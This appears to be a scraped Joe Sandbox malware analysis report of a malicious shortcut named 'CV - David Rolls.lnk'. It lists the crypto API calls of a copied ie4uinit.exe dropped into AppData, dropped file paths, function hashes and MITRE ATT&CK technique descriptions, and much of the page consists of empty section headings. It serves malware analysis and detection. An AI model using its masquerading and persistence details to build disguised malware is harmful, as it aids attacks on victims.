Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5ad889370e4e662f527ba3b3425e6f5da57ba0b4c1df0aa1662ad4328b6c2e6b
Instruction ID: 5d958ebe9b5b2a9839609bcb931fec2080928820befdb1fee0397ad130a4165c
Opcode Fuzzy Hash: 5ad889370e4e662f527ba3b3425e6f5da57ba0b4c1df0aa1662ad4328b6c2e6b
Instruction Fuzzy Hash: 92012D72E09B9596DB009F56F44405DB3A4FB48F98B988035DB8D03B18DF7CE492C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D24A0 Relevance: 5.0, APIs: 4, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,00007FF7319D248E,?,?,00000001,00007FF7319D22F4), ref: 00007FF7319D24C5
HeapFree.KERNEL32(?,?,00000000,00007FF7319D248E,?,?,00000001,00007FF7319D22F4), ref: 00007FF7319D24D3
GetProcessHeap.KERNEL32(?,?,00000000,00007FF7319D248E,?,?,00000001,00007FF7319D22F4), ref: 00007FF7319D24E8
HeapFree.KERNEL32(?,?,00000000,00007FF7319D248E,?,?,00000001,00007FF7319D22F4), ref: 00007FF7319D24F6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 13eddbd5d7e76980eb5689528629ee65ca047da04dabec2f077729e54e44d49a
Instruction ID: 72759e51be60887c0d093523844f5e894cd40604c79ecc45a0b0cf8c1ac97251
Opcode Fuzzy Hash: 13eddbd5d7e76980eb5689528629ee65ca047da04dabec2f077729e54e44d49a
Instruction Fuzzy Hash: 2DF03176E19AD292E714EB56F504069E760AB88FD4F888034DE4D17B1DDE7CE4419720

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D7AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,	9_2_00007FF7319D7AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D56A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,	9_2_00007FF7319D56A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DEA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DEA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319D763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D25C0 CryptAcquireContextW,CryptReleaseContext,	9_2_00007FF7319D25C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D7DCC memset,CryptHashCertificate,memcmp,GetLastError,	9_2_00007FF7319D7DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DE950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DE950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D2550 CryptReleaseContext,	9_2_00007FF7319D2550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D74BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,	9_2_00007FF7319D74BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DF108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DF108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,	9_2_00007FF7319D544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D73D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,	9_2_00007FF7319D73D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DEFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DEFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DE80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DE80C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DEBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	9_2_00007FF7319DEBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DE750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,	9_2_00007FF7319DE750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D2B50 CryptGenRandom,GetLastError,SysFreeString,	9_2_00007FF7319D2B50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CV - David Rolls.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\aj55hg3eude[1].htm

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

C:\Users\user\Favorites\Bing.url

C:\Windows\Temp\OLD81EC.tmp

C:\Windows\security\logs\scecomp.log

\Device\ConDrv

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
CV - David Rolls.lnk

Function 00007FF7319C1B44 Relevance: 91.3, APIs: 9, Strings: 43, Instructions: 275
registryCOMMONCrypto

Function 00007FF7319C20E4 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 228
registrylibraryloaderCOMMON

Function 00007FF7319C2DFC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 225
commemorysynchronizationCOMMON

Function 00007FF7319CB0DC Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 122
COMMON

Function 00007FF7319C2930 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 74
processCOMMONCrypto

Function 00007FF7319CA568 Relevance: 16.7, APIs: 11, Instructions: 190
fileCOMMON

Function 00007FF7319CB2C4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42
libraryloaderCOMMON

Function 00007FF7319C5974 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
windowtimethreadCOMMON